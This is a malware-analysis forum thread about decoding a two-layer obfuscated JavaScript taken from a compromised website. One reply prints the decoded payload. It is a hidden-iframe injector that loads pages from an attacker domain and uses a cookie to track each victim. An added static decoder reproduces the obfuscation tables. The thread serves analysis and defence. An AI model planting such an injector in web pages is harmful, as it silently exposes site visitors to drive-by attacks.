Malware Domain List

Malware Related => Malware Analysis => Topic started by: julevine on February 08, 2008, 11:08:26 pm

Title: decoding scripts in malzilla
Post by: julevine on February 08, 2008, 11:08:26 pm
I need help decoding this double script from freepornfotos.com

I am using Malzilla but don't know how to decode the scripts

Code: [Select]
document.write(unescape("%3Cscript%3Eif%28yX%21%3D1%29%7Bfunction%20Gt%28Pl%29%7Breturn%20Pl%7Dtry%7Bvar%20AXa%3D%2788v8Vv8Iv8Zv8kv8Mv8Nv8Jv8yv8Gv8hv83v8Yv8Kv8tv8mv8Cv85v8jv8qv8dv8Bv8Sv8sv8Rv8Tv8Wv89v8lv8Lv8cv8iv8Dv8gv8Xv86v8pv87v8Av8xv8rv84v8bv8av8nv8ev8Uv8ov8Ov8wv8zv8Fv8fv8HvV8vVVvVIvVZvVkvVMvVNvVJvVyvVGvVhvV3vVYvVKvVtvVmvVCvV5vVjvVqvVdvVBvVS%27%2C%20fVI%3DGt%28%27v%27%29%3B%20var%20DOj%3DArray%2825969%5E26005%2CkJM%28%27171%27%29%2C22080%5E22267%2CkJM%28%27170%27%29%2C29706%5E29883%2C4571%5E4467%2C23665%5E23773%2CkJM%28%27230%27%29%2CkJM%28%27213%27%29%2C26221%5E26303%2CkJM%28%27190%27%29%2C6158%5E6307%2C17023%5E17097%2CkJM%28%27183%27%29%2CkJM%28%27248%27%29%2CkJM%28%27145%27%29%2CkJM%28%27158%27%29%2C1294%5E1463%2C6482%5E6631%2CkJM%28%27189%27%29%2C6799%5E6783%2CkJM%28%27241%27%29%2CkJM%28%27163%27%29%2C5448%5E5613%2CkJM%28%27246%27%29%2C32698%5E32539%2CkJM%28%27229%27%29%2CkJM%28%27209%27%29%2C1769%5E1625%2C10271%5E10493%2CkJM%28%27255%27%29%2CkJM%28%27188%27%29%2CkJM%28%27174%27%29%2CkJM%28%27236%27%29%2C15549%5E15433%2CkJM%28%27247%27%29%2C28161%5E28321%2CkJM%28%27224%27%29%2CkJM%28%27238%27%29%2C26220%5E26335%2CkJM%28%27150%27%29%2CkJM%28%27142%27%29%2CkJM%28%27180%27%29%2C27394%5E27627%2C13100%5E13239%2C17404%5E17235%2CkJM%28%27156%27%29%2CkJM%28%27227%27%29%2C351%5E467%2C8512%5E8703%2C32450%5E32305%2CkJM%28%27232%27%29%2CkJM%28%27250%27%29%2C19346%5E19213%2CkJM%28%27149%27%29%2C5786%5E5649%2CkJM%28%27249%27%29%2C20719%5E20597%2CkJM%28%27141%27%29%2C27205%5E27343%2C23843%5E23991%2CkJM%28%27186%27%29%2CkJM%28%27164%27%29%2C1294%5E1513%2CkJM%28%27131%27%29%2CkJM%28%27134%27%29%2C11816%5E11997%2C32299%5E32393%2C13530%5E13371%2CkJM%28%27133%27%29%2C3077%5E3201%2CkJM%28%27151%27%29%2C11483%5E11313%2CkJM%28%27235%27%29%2C27176%5E27333%2C6220%5E6307%2CkJM%28%27242%27%29%29%2C%20pCw%3B%20var%20vOu%2C%20hDk%3B%20var%20MdE%3D%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%27%2C%20pLG%3D%27%27%3Bfunction%20kJM%28tzZ%29%7Breturn%20parseInt%28tzZ%29%7DAXa%3DAXa.
split%28fVI%29%3Bfor%20%28pCw%3D0%3BpCw%3CMdE.length%3BpCw+%3D2%29%7BhDk%3DMdE.substr%28pCw%2C2%29%3Bvar%20HW%3DAXa.length%3Bfor%28vOu%3D0%3BvOu%3CHW%3BvOu++%29%20%7Bif%281%3D%3D0%29%3Bif%28AXa%5BvOu%5D%3D%3DhDk%29break%3B%7DpLG+%3DString.fromCharCode%28DOj%5BvOu%5D%5E216%29%3B%20%7Ddocument.write%28pLG%29%3B%7Dcatch%28Uy%29%7B%7D%7Dvar%20yX%3D1%3C/script%3E"))
thank you
Title: Re: decoding scripts in malzilla
Post by: JohnC on February 08, 2008, 11:37:05 pm
After you let MalZilla decode that script you get this:
Code: [Select]
<script>if(yX!=1){function Gt(Pl){return Pl}try{var AXa='88v8Vv8Iv8Zv8kv8Mv8Nv8Jv8yv8Gv8hv83v8Yv8Kv8tv8mv8Cv85v8jv8qv8dv8Bv8Sv8sv8Rv8Tv8Wv89v8lv8Lv8cv8iv8Dv8gv8Xv86v8pv87v8Av8xv8rv84v8bv8av8nv8ev8Uv8ov8Ov8wv8zv8Fv8fv8HvV8vVVvVIvVZvVkvVMvVNvVJvVyvVGvVhvV3vVYvVKvVtvVmvVCvV5vVjvVqvVdvVBvVS', fVI=Gt('v'); var DOj=Array(25969^26005,kJM('171'),22080^22267,kJM('170'),29706^29883,4571^4467,23665^23773,kJM('230'),kJM('213'),26221^26303,kJM('190'),6158^6307,17023^17097,kJM('183'),kJM('248'),kJM('145'),kJM('158'),1294^1463,6482^6631,kJM('189'),6799^6783,kJM('241'),kJM('163'),5448^5613,kJM('246'),32698^32539,kJM('229'),kJM('209'),1769^1625,10271^10493,kJM('255'),kJM('188'),kJM('174'),kJM('236'),15549^15433,kJM('247'),28161^28321,kJM('224'),kJM('238'),26220^26335,kJM('150'),kJM('142'),kJM('180'),27394^27627,13100^13239,17404^17235,kJM('156'),kJM('227'),351^467,8512^8703,32450^32305,kJM('232'),kJM('250'),19346^19213,kJM('149'),5786^5649,kJM('249'),20719^20597,kJM('141'),27205^27343,23843^23991,kJM('186'),kJM('164'),1294^1513,kJM('131'),kJM('134'),11816^11997,32299^32393,13530^13371,kJM('133'),3077^3201,kJM('151'),11483^11313,kJM('235'),27176^27333,6220^6307,kJM('242')), pCw; var vOu, hDk; var 
MdE='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', pLG='';function kJM(tzZ){return parseInt(tzZ)}AXa=AXa.split(fVI);for (pCw=0;pCw<MdE.length;pCw+=2){hDk=MdE.substr(pCw,2);var HW=AXa.length;for(vOu=0;vOu<HW;vOu++) {if(1==0);if(AXa[vOu]==hDk)break;}pLG+=String.fromCharCode(DOj[vOu]^216); }document.write(pLG);}catch(Uy){}}var yX=1</script>
Remove the script tags from the beginning and end. Then remove "if(yX!=1){" and "try{" and also remove "}catch(Uy){}}var yX=1" from the end.

You can then decode it in MalZilla and will be left with:

Code: [Select]
<script>
function IFrame(){}
IFrame.prototype = {

    // attacker-controlled host and path; the cookie marks a browser that has already been served
    host : 'drivers.aero4.cn',
    path : '/x86/',
    cookieName : 'rd4va',
    cookieValue : 1,

    // 24-hour cookie (86400000 ms) so the iframe is only injected once per victim
    setCookie : function(name, value)
    {
        var d = new Date(); d.setTime(new Date().getTime() + 86400000);
        document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
    },
    install : function()
    {
        if(!this.alreadyInstalled())
        {
            // 1x1 borderless iframe pointing at the generated URL
            var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
            try { document.write(s) }
            catch(e){ document.write("<html><body>" + s + "</body></html>") }
            this.setCookie(this.cookieName, this.cookieValue);
        }
    },
    // builds http://<compromised page's host>.<16 random hex chars>.drivers.aero4.cn/x86/
    // so the compromised site's hostname is embedded as a subdomain of the attacker's domain;
    // note the replace() calls have no g flag, so only the first match is rewritten
    getFrameURL : function()
    {
        var dlh=document.location.host;
        return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
    },
    alreadyInstalled : function()
    {
        return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
    },
    // 16 random lowercase hex characters
    getRandString : function()
    {
        var l=16, c= '0123456789abcdef', o='';
        for (var i=0; i < l; i++)
            o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);

        return o;
    }
}
var o = new IFrame();
o.install();
</script>
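The two layers JohnC walks through can also be decoded statically, without letting the script anywhere near document.write. The block below is an added example, not code from this thread or from Malzilla: it re-implements the inner decoder (the token table AXa, the byte table DOj and the XOR with 216 are copied from JohnC's decoded script) and the outer unescape() layer, plus the wrapper-stripping step he describes. MDE_SAMPLE is only the first 31 tokens of the page's MdE string, OUTER_SAMPLE is a constructed stand-in for the outer wrapper, and the function names are my own.

```javascript
'use strict';

// Token table AXa and byte table DOj, copied verbatim from the decoded script
// in JohnC's post. The XOR expressions are kept as the malware wrote them.
const AXA = '88v8Vv8Iv8Zv8kv8Mv8Nv8Jv8yv8Gv8hv83v8Yv8Kv8tv8mv8Cv85v8jv8qv8dv8Bv8Sv8sv8Rv8Tv8Wv89v8lv8Lv8cv8iv8Dv8gv8Xv86v8pv87v8Av8xv8rv84v8bv8av8nv8ev8Uv8ov8Ov8wv8zv8Fv8fv8HvV8vVVvVIvVZvVkvVMvVNvVJvVyvVGvVhvV3vVYvVKvVtvVmvVCvV5vVjvVqvVdvVBvVS';
const DOJ = [
  25969 ^ 26005, 171, 22080 ^ 22267, 170, 29706 ^ 29883, 4571 ^ 4467, 23665 ^ 23773, 230,
  213, 26221 ^ 26303, 190, 6158 ^ 6307, 17023 ^ 17097, 183, 248, 145,
  158, 1294 ^ 1463, 6482 ^ 6631, 189, 6799 ^ 6783, 241, 163, 5448 ^ 5613,
  246, 32698 ^ 32539, 229, 209, 1769 ^ 1625, 10271 ^ 10493, 255, 188,
  174, 236, 15549 ^ 15433, 247, 28161 ^ 28321, 224, 238, 26220 ^ 26335,
  150, 142, 180, 27394 ^ 27627, 13100 ^ 13239, 17404 ^ 17235, 156, 227,
  351 ^ 467, 8512 ^ 8703, 32450 ^ 32305, 232, 250, 19346 ^ 19213, 149, 5786 ^ 5649,
  249, 20719 ^ 20597, 141, 27205 ^ 27343, 23843 ^ 23991, 186, 164, 1294 ^ 1513,
  131, 134, 11816 ^ 11997, 32299 ^ 32393, 13530 ^ 13371, 133, 3077 ^ 3201, 151,
  11483 ^ 11313, 235, 27176 ^ 27333, 6220 ^ 6307, 242,
];
const XOR_KEY = 216;   // DOj[vOu]^216 in the sample
const TOKEN_SEP = 'v'; // fVI = Gt('v') in the sample

// Layer 1: the outer document.write(unescape("...")) wrapper. unescape() is the
// same legacy function the browser runs, so %uXXXX sequences decode as well.
function decodeOuter(html) {
  const m = /unescape\(\s*"([^"]*)"\s*\)/.exec(html);
  if (!m) throw new Error('no unescape("...") call found');
  return unescape(m[1]);
}

// The wrapper JohnC strips by hand before the second Malzilla pass.
function stripWrapper(script) {
  return script
    .replace(/^\s*<script>/i, '')
    .replace(/<\/script>\s*$/i, '')
    .replace('if(yX!=1){', '')
    .replace('try{', '')
    .replace('}catch(Uy){}}var yX=1', '');
}

// Layer 2: every two characters of the encoded string are a token; the token's
// position in the AXa table selects a byte from DOj, which is XORed with 216.
function decodeLayer(tokenTable, byteTable, encoded, key = XOR_KEY) {
  const tokens = tokenTable.split(TOKEN_SEP);
  if (tokens.length !== byteTable.length) {
    throw new Error(`table mismatch: ${tokens.length} tokens vs ${byteTable.length} bytes`);
  }
  if (encoded.length % 2 !== 0) throw new Error('encoded string has odd length');
  const index = new Map(tokens.map((t, i) => [t, i]));
  let out = '';
  for (let p = 0; p < encoded.length; p += 2) {
    const tok = encoded.slice(p, p + 2);
    const i = index.get(tok);
    // The original silently emits "\u00d8" (undefined ^ 216) for an unknown
    // token; failing loudly is more useful when decoding by hand.
    if (i === undefined) throw new Error(`unknown token ${tok} at offset ${p}`);
    out += String.fromCharCode(byteTable[i] ^ key);
  }
  return out;
}

// First 31 tokens of the page's MdE string (the full string is much longer).
const MDE_SAMPLE = '888V8I8Z8k8M8N8J8y8G8h838Y8I8N8k8K8Y8t8m8C8Z858j8q8d8B8S8s8y8G';

// Constructed stand-in for the outer wrapper, using the same escaping scheme.
const OUTER_SAMPLE = 'document.write(unescape("%3Cscript%3Eif%28yX%21%3D1%29%7Btry%7Bvar%20a%3D1%3B%7Dcatch%28Uy%29%7B%7D%7Dvar%20yX%3D1%3C/script%3E"))';

function demo() {
  const inner = stripWrapper(decodeOuter(OUTER_SAMPLE)); // "var a=1;"
  const payload = decodeLayer(AXA, DOJ, MDE_SAMPLE);      // "<script>\r\nfunction IFrame(){}\r\n"
  return { inner, payload };
}

console.log(demo());
```

Run it with node; the payload printed is the first line of the script JohnC posted, so the tables were copied correctly. The approach only works because the decoder is a pure function of constants embedded in the script; when the key or table is derived from document.location, arguments.callee or a cookie, you have to supply those values (or emulate the DOM, as Malzilla does) rather than reconstruct the algorithm.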
Title: Re: decoding scripts in malzilla
Post by: sowhat-x on February 09, 2008, 12:59:48 am
Lol, JohnC... now that was fast! :)

Never really bothered myself getting into JavaScript,
just basic stuff that came up as a result of daily needs...
so when bobby released Malzilla, I went... 'wow - this really saves my butt (and time!)'  :D
To be honest, I wasn't even really appreciating JS that much; what I was thinking was kind of...
''...oh well, in the final end, it's meant for guys dedicated strictly to professional web development,
they're the target group here..." - something which is quite a bit beyond my personal interests...

Until one day, he-he... I came across this tool from OWASP,
a full-blown program completely written in JS... and it certainly changed my mind for good:
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
It's completely irrelevant to casual web development, and to malware analysis too of course,
meant for penetration testing and such stuff...
But it's an excellent proof that even the supposedly 'simpler' scripting languages
can be really powerful if you seriously dive into them...